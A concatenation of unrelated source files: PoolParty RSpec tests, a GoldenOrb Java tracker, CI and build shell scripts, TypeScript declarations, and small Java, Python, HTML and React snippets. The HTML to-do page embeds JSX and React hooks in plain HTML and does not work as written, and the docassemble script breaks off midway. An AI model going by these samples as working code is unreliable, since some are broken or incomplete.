before(:each) do
setup
reset_resources!
end
describe "wrapped" do
before(:each) do
@obj = Object.new
@pool = pool :just_pool do; end
end
it "should respond to the pool method outside the block" do
@obj.respond_to?(:cloud).should == true
end
describe "global" do
before(:each) do
@cloud1 = cloud :pop do;end
end
it "should store the cloud in the global list of clouds" do
@obj.clouds.has_key?(:pop).should == true
end
it "should store the cloud" do
@obj.cloud(:pop).should == @cloud1
end
it "should have set the using base on intantiation to ec2" do
@cloud1.using_remoter?.should_not == nil
end
it "should say the remoter_base is ec2 (by default)" do
@cloud1.remote_base.should == PoolParty::Ec2
end
end
it "should return the cloud if the cloud key is already in the clouds list" do
@cld = cloud :pop do;end
@pool.cloud(:pop).should == @cld
end
describe "options" do
before(:each) do
reset!
setup
@p = pool :options do
minimum_instances 100
access_key "access_key"
cloud :apple do
access_key "cloud_access_key"
end
end
@c = @p.cloud(:apple)
end
it "should be able to grab the cloud from the pool" do
@c.should == @p.cloud(:apple)
end
it "should take the options set on the pool" do
@p.minimum_instances.should == 100
end
it "should take the access_key option set from the cloud" do
@c.access_key.should == "cloud_access_key"
end
end
describe "block" do
before(:each) do
reset!
@cloud = Cloud.new(:test, @pool) do
# Inside cloud block
keypair "fake_keypair"
end
@cloud.stub!(:plugin_store).and_return []
end
it "should be able to pull the pool from the cloud" do
@cloud.parent == @pool
end
it "should have the outer pool listed as the parent of the inner cloud" do
@pool = pool :knick_knack do
cloud :paddy_wack do
end
end
cloud(:paddy_wack).parent.should == pool(:knick_knack)
end
it "should have services in an array" do
@cloud.services.class.should == Array
end
it "should have no services in the array when there are no services defined" do
@cloud.services.size.should == 0
end
it "should respond to a configure method" do
@cloud.respond_to?(:configure).should == true
end
describe "configuration" do
before(:each) do
reset!
@cloud2 = Cloud.new(:test, @pool) do
minimum_instances 1
maximum_instances 2
end
end
it "should be able to se the minimum_instances without the var" do
@cloud2.minimum_instances.should == 1
end
it "should be able to se the maximum_instances with the =" do
@cloud2.maximum_instances.should == 2
end
end
describe "options" do
it "should set the minimum_instances to 2" do
@cloud.minimum_instances.should == 2
end
it "should set the maximum_instances to 5" do
@cloud.maximum_instances.should == 5
end
it "should be able to set the minimum instances" do
@cloud.minimum_instances 3
@cloud.minimum_instances.should == 3
end
it "should be able to take a hash from configure and convert it to the options" do
@cloud.configure( {:minimum_instances => 1, :maximum_instances => 10, :keypair => "friend"} )
@cloud.keypair.should == "friend"
end
describe "minimum_instances/maximum_instances as a range" do
before(:each) do
reset!
@pool = pool :just_pool do
cloud :app do
instances 8..15
end
end
@cloud = @pool.cloud(:app)
end
it "should set the minimum based on the range" do
@cloud.minimum_instances.should == 8
end
it "should set the maximum based on the range set by instances" do
@cloud.maximum_instances.should == 15
end
end
describe "keypair" do
before(:each) do
reset!
end
it "should be able to define a keypair in the cloud" do
@c = cloud :app do
keypair "hotdog"
end
@c.keypair.should == "hotdog"
end
it "should take the pool parent's keypair if it's defined on the pool" do
pool :pool do
keypair "ney"
cloud :app do
end
cloud :group do
end
end
pool(:pool).cloud(:app).keypair.should == "ney"
pool(:pool).cloud(:group).keypair.should == "ney"
end
it "should generate a keypair based on the cloud name if none is defined" do
pool :pool do
cloud :app do
end
cloud :nickes do
end
end
pool(:pool).cloud(:app).keypair.should == "pool_app"
pool(:pool).cloud(:nickes).keypair.should == "pool_nickes"
end
end
describe "Manifest" do
before(:each) do
reset!
stub_list_from_remote_for(@cloud)
@cloud.instance_eval do
has_file(:name => "/etc/httpd/http.conf") do
content <<-EOE
hello my lady
EOE
end
has_gempackage(:name => "poolparty")
has_package(:name => "dummy")
end
end
it "should it should have the method build_manifest" do
@cloud.respond_to?(:build_manifest).should == true
end
it "should make a new 'haproxy' class" do
@cloud.stub!(:realize_plugins!).and_return true
PoolPartyHaproxyClass.should_receive(:new).once
@cloud.add_poolparty_base_requirements
end
it "should have 3 resources" do
@cloud.add_poolparty_base_requirements
@cloud.number_of_resources.should > 2
end
it "should receive add_poolparty_base_requirements before building the manifest" do
@cloud.should_receive(:add_poolparty_base_requirements).once
@cloud.build_manifest
end
describe "add_poolparty_base_requirements" do
before(:each) do
reset!
@cloud.instance_eval do
@heartbeat = nil
end
@hb = "heartbeat".class_constant.new(@cloud)
@cloud.stub!(:realize_plugins!).and_return []
end
it "should call initialize on heartbeat (in add_poolparty_base_requirements)" do
@cloud.stub!(:realize_plugins!).and_return []
@hb.class.should_receive(:new).and_return true
@cloud.add_poolparty_base_requirements
end
it "should call heartbeat on the cloud" do
@cloud.should_receive(:heartbeat).and_return true
@cloud.add_poolparty_base_requirements
end
it "should call Hearbeat.new" do
"heartbeat".class_constant.should_receive(:new).and_return @hb
@cloud.add_poolparty_base_requirements
end
it "should call enable on the plugin call" do
@hb = "heartbeat".class_constant
"heartbeat".class_constant.stub!(:new).and_return @hb
@cloud.add_poolparty_base_requirements
@cloud.heartbeat.should == @hb
end
describe "after adding" do
before(:each) do
stub_list_from_remote_for(@cloud)
@cloud.add_poolparty_base_requirements
end
it "should add resources onto the heartbeat class inside the cloud" do
@cloud.services.size.should > 0
end
it "should store the class heartbeat" do
@cloud.services.map {|a| a.class}.include?("heartbeat".class_constant).should == true
end
it "should have an array of resources on the heartbeat" do
@cloud.services.first.resources.class.should == Hash
end
describe "resources" do
before(:each) do
@cloud8 = Cloud.new(:tester, @pool) do
test_service
end
@service = @cloud8.services.first
@files = @service.resource(:file)
end
it "should have a file resource" do
@files.first.nil?.should == false
end
it "should have an array of lines" do
@files.class.should == Array
end
it "should not be empty" do
@files.should_not be_empty
end
end
end
end
describe "building" do
before(:each) do
str = "master 192.168.0.1
node1 192.168.0.2"
@sample_instances_list = [{:ip => "192.168.0.1", :name => "master"}, {:ip => "192.168.0.2", :name => "node1"}]
@ris = @sample_instances_list.map {|h| PoolParty::Remote::RemoteInstance.new(h, @cloud) }
stub_remoter_for(@cloud)
@manifest = @cloud.build_manifest
end
it "should return a string when calling build_manifest" do
@manifest.class.should == String
end
it "should have a comment of # file in the manifest as described by the has_file" do
@manifest.should =~ /file \{/
end
it "should have the comment of a package in the manifest" do
@manifest.should =~ /package \{/
end
it "should have the comment for haproxy in the manifest" do
@manifest.should =~ /haproxy/
end
it "should include the poolparty gem" do
@manifest.should =~ /package \{/
end
it "should include custom functions" do
@manifest.should =~ /define line\(\$file/
end
end
describe "prepare_for_configuration" do
before(:each) do
@cloud.stub!(:copy_ssh_key).and_return true
@cloud.stub!(:before_configuration_tasks).and_return []
end
it "should make_base_directory" do
@cloud.should_receive(:make_base_directory).at_least(1)
end
it "should copy_misc_templates" do
@cloud.should_receive(:copy_misc_templates).once
end
describe "copy_custom_templates" do
it "should receive copy_custom_templates" do
@cloud.should_receive(:copy_custom_templates).once
end
it "test to see if the directory Dir.pwd/templates exists" do
::File.should_receive(:directory?).with("#{Dir.pwd}/templates").and_return false
::File.stub!(:directory?).and_return true
@cloud.copy_custom_templates
end
it "copy each file to the template directory" do
Dir.stub!(:[]).with("#{Dir.pwd}/templates/*").and_return ["pop"]
::File.stub!(:directory?).with("#{Dir.pwd}/templates").and_return true
::File.stub!(:directory?).and_return true
@cloud.should_receive(:copy_template_to_storage_directory).with("pop", true).once
@cloud.stub!(:copy_template_to_storage_directory).and_return true
@cloud.copy_custom_templates
end
end
it "should copy_custom_monitors" do
@cloud.should_receive(:copy_custom_monitors).once
end
it "should call before_configuration_tasks callback" do
@cloud.should_receive(:before_configuration_tasks).once
end
it "should call call write_unique_cookie" do
@cloud.should_receive(:write_unique_cookie).once
end
describe "copy_custom_monitors" do
before(:each) do
Base.stub!(:custom_monitor_directories).and_return ["/tmp/monitors/custom_monitor.rb"]
Dir.stub!(:[]).with("#{Base.custom_monitor_directories}/*.rb").and_return ["/tmp/monitors/custom_monitor.rb"]
@cloud.stub!(:copy_misc_templates).and_return true
@cloud.stub!(:copy_file_to_storage_directory).and_return true
end
it "should call make_directory_in_storage_directory with monitors" do
@cloud.should_receive(:make_directory_in_storage_directory).with("monitors").once
@cloud.stub!(:make_directory_in_storage_directory)
end
it "should copy the monitors into the monitor directory" do
@cloud.should_receive(:copy_file_to_storage_directory).with("/tmp/monitors/custom_monitor.rb", "monitors").at_least(1)
@cloud.stub!(:copy_file_to_storage_directory).and_return true
end
after(:each) do
@cloud.copy_custom_monitors
end
end
it "should store_keys_in_file" do
@cloud.should_receive(:store_keys_in_file).once
end
it "should call save! on Script" do
Script.should_receive(:save!).with(@cloud).once
end
it "should copy_ssh_key" do
@cloud.should_receive(:copy_ssh_key).once
end
after(:each) do
@cloud.prepare_for_configuration
end
end
describe "building with an existing manifest" do
before(:each) do
@file = "/etc/puppet/manifests/nodes/nodes.pp"
@file.stub!(:read).and_return "nodes generate"
::FileTest.stub!(:file?).with("/etc/puppet/manifests/classes/poolparty.pp").and_return true
@cloud.stub!(:open).with("/etc/puppet/manifests/classes/poolparty.pp").and_return @file
end
it "should not call resources_string_from_resources if the file /etc/puppet/manifests/nodes/nodes.pp exists" do
@cloud.should_not_receive(:add_poolparty_base_requirements)
@cloud.build_manifest
end
it "should build from the existing file" do
@cloud.build_manifest.should == "nodes generate"
end
end
end
describe "minimum_runnable_options" do
it "should be an array on the cloud" do
@cloud.minimum_runnable_options.class.should == Array
end
["keypair","minimum_instances","maximum_instances",
"expand_when","contract_when","set_master_ip_to"].each do |k|
eval <<-EOE
it "should have #{k} in the minimum_runnable_options" do
@cloud.minimum_runnable_options.include?(:#{k}).should == true
end
EOE
end
it "should include the custom_minimum_runnable_options" do
@cloud.stub!(:custom_minimum_runnable_options).and_return [:blank]
@cloud.minimum_runnable_options.include?(:blank).should == true
end
end
describe "unique_cookie" do
it "should have the method generate generate_unique_cookie_string" do
@cloud.respond_to?(:generate_unique_cookie_string).should == true
end
it "should call hexdigest to digest/sha" do
Digest::SHA256.should_receive(:hexdigest).with("#{@cloud.full_keypair_name}#{@cloud.name}").and_return "blaaaaah"
@cloud.generate_unique_cookie_string
end
it "should generate the same cookie string every time" do
older = @cloud.generate_unique_cookie_string
old = @cloud.generate_unique_cookie_string
new_one = @cloud.generate_unique_cookie_string
older.should == old
old.should == new_one
new_one.should == older
end
end
end
describe "instances" do
before(:each) do
@cloud3 = cloud :pop do;keypair "fake_keypair";end
stub_list_from_remote_for(@cloud3)
end
it "should respond to the method master" do
@cloud3.respond_to?(:master).should == true
end
it "should return a master that is not nil" do
@cloud3.master.should_not be_nil
end
end
end
end
end |
#!/bin/bash
set -x
# a default non-root role
MONGO_NON_ROOT_ROLE="${MONGO_NON_ROOT_ROLE:-readWrite}"
if [ -n "${MONGO_NON_ROOT_USERNAME:-}" ] && [ -n "${MONGO_NON_ROOT_PASSWORD:-}" ]; then
"${mongo[@]}" "$MONGO_INITDB_DATABASE" <<-EOJS
db.createUser({
user: $(_js_escape "$MONGO_NON_ROOT_USERNAME"),
pwd: $(_js_escape "$MONGO_NON_ROOT_PASSWORD"),
roles: [ { role: $(_js_escape "$MONGO_NON_ROOT_ROLE"), db: $(_js_escape "$MONGO_INITDB_DATABASE") } ]
})
EOJS
else
# print warning or kill temporary mongo and exit non-zero
exit 1
fi |
<filename>src/main/java/org/goldenorb/OrbTracker.java
/**
* Licensed to Ravel, Inc. under one
* or more contributor license agreements. See the NOTICE file
* distributed with this work for additional information
* regarding copyright ownership. Ravel, Inc. licenses this file
* to you under the Apache License, Version 2.0 (the
* "License"); you may not use this file except in compliance
* with the License. You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package org.goldenorb;
import java.io.IOException;
import java.net.UnknownHostException;
import org.apache.hadoop.filecache.DistributedCache;
import org.apache.hadoop.fs.FileSystem;
import org.apache.hadoop.fs.Path;
import org.apache.hadoop.ipc.RPC;
import org.apache.hadoop.ipc.RPC.Server;
import org.apache.zookeeper.CreateMode;
import org.apache.zookeeper.ZooKeeper;
import org.goldenorb.conf.OrbConfigurable;
import org.goldenorb.conf.OrbConfiguration;
import org.goldenorb.event.OrbCallback;
import org.goldenorb.event.OrbEvent;
import org.goldenorb.event.OrbExceptionEvent;
import org.goldenorb.jet.OrbTrackerMember;
import org.goldenorb.jet.PartitionRequest;
import org.goldenorb.jet.PartitionRequestResponse;
import org.goldenorb.net.OrbDNS;
import org.goldenorb.util.ResourceAllocator;
import org.goldenorb.zookeeper.LeaderGroup;
import org.goldenorb.zookeeper.OrbZKFailure;
import org.goldenorb.zookeeper.ZookeeperUtils;
import org.slf4j.Logger;
import org.slf4j.LoggerFactory;
/**
* OrbTracker extends {@link OrbTrackerMember}, which allows them to run as either
* leaders or slaves. The leader OrbTracker is responsible for creating the LeaderGroup and coordinating
* with other OrbTrackers via ZooKeeper and Hadoop RPC. OrbTracker also starts the {@link JobManager}
* and {@link OrbPartitionManager}.
*
*/
public class OrbTracker extends OrbTrackerMember implements Runnable, OrbConfigurable {
public static final String ZK_BASE_PATH = "/GoldenOrb";
private final Logger logger = LoggerFactory.getLogger(OrbTracker.class);
// private OrbConfiguration orbConf;
private ZooKeeper zk;
private LeaderGroup<OrbTrackerMember> leaderGroup;
private Server server = null;
private boolean leader = false;
private JobManager<OrbTrackerMember> jobManager;
private OrbCallback orbCallback;
private boolean runTracker = true;
private ResourceAllocator<OrbTrackerMember> resourceAllocator;
private OrbPartitionManager<OrbPartitionProcess> partitionManager;
/**
*
* @param String[] args
*/
public static void main(String[] args) {
new Thread(new OrbTracker(new OrbConfiguration(true))).start();
}
/**
* Constructor
*
* @param OrbConfiguration orbConf
*/
public OrbTracker(OrbConfiguration orbConf) {
setOrbConf(orbConf);
}
/**
*
*/
public void run() {
// get hostname
try {
setHostname(OrbDNS.getDefaultHost(getOrbConf()));
setPort(getOrbConf().getOrbTrackerPort());
logger.info("Starting OrbTracker on: " + getHostname() + getPort());
} catch (UnknownHostException e) {
logger.error("Unable to get hostname.", e);
System.exit(-1);
}
// startServer
try {
logger.info("starting RPC server on " + getHostname() + ":" + getPort());
server = RPC.getServer(this, getHostname(), getPort(), getOrbConf());
server.start();
logger.info("starting OrbPartitionManager");
// change from MockPartitionThread to OrbPartitionProcess
partitionManager = new OrbPartitionManager<OrbPartitionProcess>(getOrbConf(), OrbPartitionProcess.class);
} catch (IOException e) {
logger.error("Unable to get hostname.", e);
System.exit(-1);
}
// connect to zookeeper
try {
establishZookeeperConnection();
} catch (Exception e) {
logger.error("Failed to connect to Zookeeper", e);
System.exit(-1);
}
// establish the zookeeper tree and join the cluster
try {
establishZookeeperTree();
} catch (OrbZKFailure e) {
logger.error("Major Zookeeper Error: ", e);
System.exit(-1);
}
if (leaderGroup.isLeader()) {
executeAsLeader();
} else {
executeAsSlave();
}
}
/**
*
*/
private void executeAsSlave() {
synchronized (this) {
leader = false;
if (jobManager != null) {
jobManager.shutdown();
}
}
waitLoop();
}
/**
*
*/
private void executeAsLeader() {
synchronized (this) {
resourceAllocator = new ResourceAllocator<OrbTrackerMember>(getOrbConf(), leaderGroup.getMembers());
leader = true;
orbCallback = new OrbTrackerCallback();
jobManager = new JobManager<OrbTrackerMember>(orbCallback, getOrbConf(), zk, resourceAllocator,
leaderGroup.getMembers());
}
waitLoop();
}
/**
*
*/
private void waitLoop() {
while (runTracker) {
synchronized (this) {
try {
wait();
} catch (InterruptedException e) {
logger.error(e.getMessage());
}
}
if (leaderGroup.isLeader()) {
executeAsLeader();
} else {
executeAsSlave();
}
}
}
/**
*
*/
private void establishZookeeperTree() throws OrbZKFailure {
ZookeeperUtils.notExistCreateNode(zk, ZK_BASE_PATH);
ZookeeperUtils.notExistCreateNode(zk, ZK_BASE_PATH + "/" + getOrbConf().getOrbClusterName());
ZookeeperUtils.notExistCreateNode(zk, ZK_BASE_PATH + "/" + getOrbConf().getOrbClusterName() + "/OrbTrackers");
if (ZookeeperUtils.nodeExists(zk, ZK_BASE_PATH + "/" + getOrbConf().getOrbClusterName() + "/OrbTrackers/"
+ getHostname())) {
logger.info("Already have an OrbTracker on " + getHostname() + "(Exiting)");
System.exit(-1);
} else {
ZookeeperUtils.tryToCreateNode(zk, ZK_BASE_PATH + "/" + getOrbConf().getOrbClusterName() + "/OrbTrackers/"
+ getHostname(), CreateMode.EPHEMERAL);
}
this.setAvailablePartitions(getOrbConf().getNumberOfPartitionsPerMachine());
this.setInUsePartitions(0);
this.setReservedPartitions(0);
this.setLeader(false);
this.setPartitionCapacity(getOrbConf().getNumberOfPartitionsPerMachine());
leaderGroup = new LeaderGroup<OrbTrackerMember>(zk, new OrbTrackerCallback(),
ZK_BASE_PATH + "/" + getOrbConf().getOrbClusterName() + "/OrbTrackerLeaderGroup", this,
OrbTrackerMember.class);
}
public class OrbTrackerCallback implements OrbCallback {
/**
*
* @param OrbEvent e
*/
@Override
public void process(OrbEvent e) {
int eventCode = e.getType();
if (eventCode == OrbEvent.ORB_EXCEPTION) {
((OrbExceptionEvent) e).getException().printStackTrace();
} else if (eventCode == OrbEvent.LEADERSHIP_CHANGE) {
synchronized (OrbTracker.this) {
if ((leaderGroup.isLeader() && !leader) || (!leaderGroup.isLeader() && leader)) {
OrbTracker.this.notify();
}
}
}
}
}
/**
*
*/
public void leave() {
runTracker = false;
leaderGroup.leave();
if (jobManager != null) {
jobManager.shutdown();
}
}
/**
*
*/
private void establishZookeeperConnection() throws IOException, InterruptedException {
zk = ZookeeperUtils.connect(getOrbConf().getOrbZooKeeperQuorum());
}
/**
*
* @param PartitionRequest request
* @returns PartitionRequestResponse
*/
@Override
public PartitionRequestResponse requestPartitions(PartitionRequest request) {
logger.info("requestPartitions");
PartitionRequestResponse response = null;
try {
partitionManager.launchPartitions(request);
} catch (InstantiationException e) {
logger.error(e.getMessage());
} catch (IllegalAccessException e) {
logger.error(e.getMessage());
}
return response;
}
@Override
public void killJob(String jobNumber){
partitionManager.kill(jobNumber);
}
@Override
public void getRequiredFiles(OrbConfiguration jobConf) throws OrbZKFailure{
logger.info("jobConf.getHDFSdistributedFiles(): {}", jobConf.getHDFSdistributedFiles());
try {
Path[] hdfsPaths = jobConf.getHDFSdistributedFiles();
if (hdfsPaths != null) {
String baseLocalPath = System.getProperty("java.io.tmpdir") + "/GoldenOrb/"
+ jobConf.getOrbClusterName() + "/" + jobConf.getJobNumber() + "/";
FileSystem fs = FileSystem.get(jobConf);
for (Path path : hdfsPaths) {
String[] name = path.toString().split("/");
fs.copyToLocalFile(path, new Path(baseLocalPath + name[name.length - 1]));
logger.info(path.toString() + " copied from HDFS to local machine at " + baseLocalPath
+ name[name.length - 1]);
}
}
} catch (IOException e) {
logger.error("EXCEPTION occured while copying files from HDFS to local machine : " + e.getMessage());
e.printStackTrace();
//throw new OrbZKFailure(e);
}
}
}
|
import {Router} from '../index'
const runRouter = async () => {
let bindAddress1 = 'tcp://127.0.0.1:5039'
let bindAddress2 = 'tcp://127.0.0.1:5040'
let router1 = new Router({ id: 'TestRouter1', options: {layer: 'RouterLayer1'} })
let router2 = new Router({ id: 'TestRouter2', options: {layer: 'RouterLayer2'} })
router1.debugMode(true)
router2.debugMode(true)
await router1.bind(bindAddress1)
await router2.bind(bindAddress2)
// setTimeout(async () => {
// console.log(`Start unbind from ${bindAddress1} .... `)
// await router1.unbind()
// console.log(`Finish unbind from ${bindAddress1} .... `)
// }, 10000)
}
runRouter()
|
#!/bin/bash
set -ex
if [ $TRAVIS != "true" ]; then
echo "This should only be run from travis."
exit 1
fi
pushd /tmp
# Get the SDK tar and untar it.
TARFILE=google-cloud-sdk.tar.gz
wget https://dl.google.com/dl/cloudsdk/release/$TARFILE
tar xzf $TARFILE
rm $TARFILE
# Install the SDK
./google-cloud-sdk/install.sh \
--usage-reporting false \
--path-update false \
--command-completion false
gcloud -q components update
gcloud -q components install app-engine-go
# Set config.
gcloud config set disable_prompts True
gcloud config set project $GOLANG_SAMPLES_PROJECT_ID
gcloud config set app/promote_by_default false
gcloud auth activate-service-account --key-file "$GOOGLE_APPLICATION_CREDENTIALS"
# Diagnostic information.
gcloud info
popd
|
#!/bin/bash -xeu
export ZEPHYR_TOOLCHAIN_VARIANT=zephyr
export ZEPHYR_BASE=$(pwd)/zephyr/zephyr
export ZEPHYR_SDK_INSTALL_DIR=$(pwd)/zephyr/sdk
mkdir -p artifacts
pushd $ZEPHYR_BASE/samples/hello_world
cp prj.conf prj-no-mpu.conf
echo "CONFIG_ARM_MPU=n" >> prj-no-mpu.conf
west build -p auto -b mimxrt1064_evk -- -G'Unix Makefiles' -DCONF_FILE=prj-no-mpu.conf
popd
cp $ZEPHYR_BASE/samples/hello_world/build/zephyr/zephyr.elf artifacts/zephyr-hello_world.elf
pushd $ZEPHYR_BASE/samples/subsys/shell/shell_module
cp prj.conf prj-no-mpu.conf
echo "CONFIG_ARM_MPU=n" >> prj-no-mpu.conf
west build -p auto -b mimxrt1064_evk -- -G'Unix Makefiles' -DCONF_FILE=prj-no-mpu.conf
popd
cp $ZEPHYR_BASE/samples/subsys/shell/shell_module/build/zephyr/zephyr.elf artifacts/zephyr-shell_module.elf
|
#!/bin/sh
# Sleep 15 seconds to let the VPN to connect
sleep 15
# Install curl
apk add --no-cache curl
# Display the current IP address
echo "Your IP address from VPN:"
curl -s http://icanhazip.com/
|
#!/usr/bin/env bash
###############################################################################
# Copyright 2018 The Apollo Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
###############################################################################
# Get the absolute path.
i=0;
for file_name in $@
do
DIR=$(cd "$(dirname ${file_name} )" && pwd)
FILE_NAME=$(basename ${file_name})
PATH_NAME[i++]="${DIR}/${FILE_NAME}"
done
#echo "${PATH_NAME[@]}"
cd /apollo
./bazel-bin/modules/map/relative_map/tools/navigator "${PATH_NAME[@]}"
|
/* eslint-disable max-classes-per-file,import/export */
declare module 'hummus' {
import {EventEmitter} from 'events';
export class PDFWriter {
end(): void;
getEvents(): EventEmitter;
triggerDocumentExtensionEvent(eventName: string, eventParams: any): void;
startPageContentContext(page: number): PDFPageContentContext;
pausePageContentContext(context: PDFPageContentContext): void;
getImageDimensions(
imageFilePath: string,
): {
width: number;
height: number;
};
createImageXObjectFromJPG(imageFilePath: string): XObject;
createFormXObjectFromJPG(imageFilePath: string): XObject;
createFormXObjectFromPNG(imageFilePath: string): XObject;
}
export class PDFWStream {
write(inBytesArray: number[]): number;
getCurrentPosition(): number;
}
export class PDFWStreamForFile extends PDFWStream {
constructor(inPath: string);
close(cb: () => void): void;
}
export class PDFWStreamForBuffer extends PDFWStream {
constructor();
}
export class PDFRStream {
read(inAmount: number): number;
notEnded(): boolean;
setPosition(inPosition: number): void;
setPositionFromEnd(inPosition: number): void;
skip(inAmount: number): void;
getCurrentPosition(): number;
}
export class PDFRStreamForFile extends PDFRStream {
constructor(inPath: string);
close(inCallback: () => void): void;
}
export class PDFRStreamForBuffer extends PDFRStream {
constructor(buffer: Buffer);
}
export class PDFPageModifier {
constructor(pdfWriter: PDFWriter, pageIndex: number, graphicsFlag?: boolean);
startContext(): PDFPageContentContext;
endContext(): PDFPageContentContext;
}
export enum ImageFit {
always = 'always',
overflow = 'overflow',
}
export interface ImageOptions {
index?: number;
transformation?:
| number[]
| {
width: number;
height: number;
proportional?: boolean;
fit?: ImageFit;
};
}
export type XObject = Record<string, unknown>;
export class PDFPageContentContext {
constructor();
getContext(): PDFPageContentContext;
writePage(): void;
drawImage(x: number, y: number, imageFilePath: string, options?: ImageOptions): void;
q(): PDFPageContentContext;
Q(): PDFPageContentContext;
cm(a: number, b: number, c: number, d: number, e: number, f: number): PDFPageContentContext;
doXObject(xObject: XObject): PDFPageContentContext;
}
export function createWriterToModify(inFilePath: string, inOptionsObject?: Record<string, unknown>): PDFWriter;
export function createWriterToModify(ifSourceStream: PDFRStream, inTargetStream: PDFWStream, inOptionsObject?: Record<string, unknown>): PDFWriter;
}
|
<gh_stars>1-10
package org.jaudiotagger.issues;
import org.jaudiotagger.AbstractTestCase;
import org.jaudiotagger.audio.mp3.MP3File;
import org.jaudiotagger.tag.FieldKey;
import org.jaudiotagger.tag.id3.ID3v11Tag;
import org.jaudiotagger.tag.id3.ID3v23Tag;
import java.io.File;
/**
* Test deleting track total field shouldn't delete track field
*/
public class Issue420Test extends AbstractTestCase
{
public void testReadingFieldsThatOnlyExistInID3v1tag() throws Exception
{
File testFile = AbstractTestCase.copyAudioToTmp("testV1.mp3", new File("testReadingFieldsThatOnlyExistInID3v1tag.mp3"));
MP3File mp3File = new MP3File(testFile);
assertFalse(mp3File.hasID3v1Tag());
assertFalse(mp3File.hasID3v2Tag());
mp3File.setID3v1Tag(new ID3v11Tag());
mp3File.setID3v2Tag(new ID3v23Tag());
mp3File.getID3v1Tag().setYear("1971");
//TODO this seems wrong
assertNull(mp3File.getTag());
mp3File.save();
mp3File = new MP3File(testFile);
assertNotNull(mp3File.getTag());
assertEquals(0,mp3File.getTag().getFields("TYER").size());
assertEquals(0,mp3File.getTag().getFields(FieldKey.YEAR).size());
assertEquals(1,mp3File.getID3v1Tag().getFields(FieldKey.YEAR).size());
}
}
|
const colors = ['red', 'blue', 'green'];
const secondColor = colors[1];
console.log(secondColor); // Output: blue |
package seoul.democracy.issue.domain;
import lombok.AllArgsConstructor;
import lombok.Getter;
import lombok.NoArgsConstructor;
import org.springframework.util.CollectionUtils;
import seoul.democracy.issue.dto.IssueFileDto;
import javax.persistence.Column;
import javax.persistence.Embeddable;
import java.util.ArrayList;
import java.util.List;
/**
* 이슈 파일
*/
@Getter
@Embeddable
@NoArgsConstructor
@AllArgsConstructor(staticName = "create")
public class IssueFile {
/**
* 파일 순번
*/
@Column(name = "FILE_SEQ")
private Integer seq;
/**
* 파일 이름
*/
@Column(name = "FILE_NAME")
private String name;
/**
* 파일 URL
*/
@Column(name = "FILE_URL")
private String url;
public static List<IssueFile> create(List<IssueFileDto> createFiles) {
if (CollectionUtils.isEmpty(createFiles)) return null;
List<IssueFile> files = new ArrayList<>();
for (int i = 0; i < createFiles.size(); i++) {
IssueFileDto fileDto = createFiles.get(i);
files.add(IssueFile.create(i, fileDto.getName(), fileDto.getUrl()));
}
return files;
}
}
|
import sqlite3
class ContactManager:
def __init__(self, db_name):
self.connection = sqlite3.connect(db_name)
def add_contact(self, name, email):
cursor = self.connection.cursor()
cursor.execute("INSERT INTO contacts (name, email) VALUES (?, ?)", (name, email))
self.connection.commit()
cursor.close()
def get_contact(self, name):
cursor = self.connection.cursor()
cursor.execute("SELECT email FROM contacts WHERE name=?", (name,))
contact = cursor.fetchone()
cursor.close()
return contact[0] if contact else None
def destroy(self):
self.connection.close() |
<html>
<head>
<title>To-Do List App</title>
</head>
<body>
<h1>To-Do List</h1>
<ul>
{list.map(item => (
<li>{item}</li>
))}
</ul>
<form onSubmit={onSubmit}>
<input type="text"
value={text}
onChange={onChange}
/>
<button>Add Item</button>
</form>
<script>
const list = ['Dishes', 'Laundry'];
const [text, setText] = React.useState('');
const onChange = (e) => {
setText(e.target.value);
};
const onSubmit = (e) => {
e.preventDefault();
list.push(text);
setText('');
};
</script>
</body>
</html> |
import React from 'react';
import Head from 'next/head';
import Link from 'next/link';
export default (): JSX.Element => (
<React.Fragment>
<Head>
<title>Buscaminas</title>
<link rel="stylesheet" type="text/css" href="/static/style.css" />
</Head>
<h1>Buscaminas</h1>
<p>
<Link href="/styleA">
<a className="menu">Versión A</a>
</Link>
</p>
<p>
<Link href="/styleB">
<a className="menu">Versión B</a>
</Link>
</p>
</React.Fragment>
);
|
#! /bin/bash
export HOME=/root
export DA_ROOT="${DA_ROOT:-/usr/share/docassemble}"
export DAPYTHONVERSION="${DAPYTHONVERSION:-3}"
export DA_DEFAULT_LOCAL="local3.8"
export DA_ACTIVATE="${DA_PYTHON:-${DA_ROOT}/${DA_DEFAULT_LOCAL}}/bin/activate"
echo "Activating with ${DA_ACTIVATE}"
source "${DA_ACTIVATE}"
export DA_CONFIG_FILE_DIST="${DA_CONFIG_FILE_DIST:-${DA_ROOT}/config/config.yml.dist}"
export DA_CONFIG_FILE="${DA_CONFIG:-${DA_ROOT}/config/config.yml}"
export CONTAINERROLE=":${CONTAINERROLE:-all}:"
function cmd_retry() {
local -r cmd="$@"
local -r -i max_attempts=4
local -i attempt_num=1
until $cmd
do
if ((attempt_num==max_attempts))
then
echo "Attempt $attempt_num failed. Not trying again"
return 1
else
if ((attempt_num==1)); then
echo $cmd
fi
echo "Attempt $attempt_num failed."
sleep $(((attempt_num++)**2))
fi
done
}
echo "config.yml is at" $DA_CONFIG_FILE >&2
echo "1" >&2
export DEBIAN_FRONTEND=noninteractive
if [ "${DAALLOWUPDATES:-true}" == "true" ]; then
apt-get clean &> /dev/null
apt-get -q -y update &> /dev/null
fi
echo "2" >&2
if [ -f /var/run/apache2/apache2.pid ]; then
APACHE_PID=$(</var/run/apache2/apache2.pid)
if kill -0 $APACHE_PID &> /dev/null; then
APACHERUNNING=true
else
rm -f /var/run/apache2/apache2.pid
APACHERUNNING=false
fi
else
APACHERUNNING=false
fi
if [ -f /var/run/nginx.pid ]; then
NGINX_PID=$(</var/run/nginx.pid)
if kill -0 $NGINX_PID &> /dev/null; then
NGINXRUNNING=true
else
rm -f /var/run/nginx.pid
NGINXRUNNING=false
fi
else
NGINXRUNNING=false
fi
echo "3" >&2
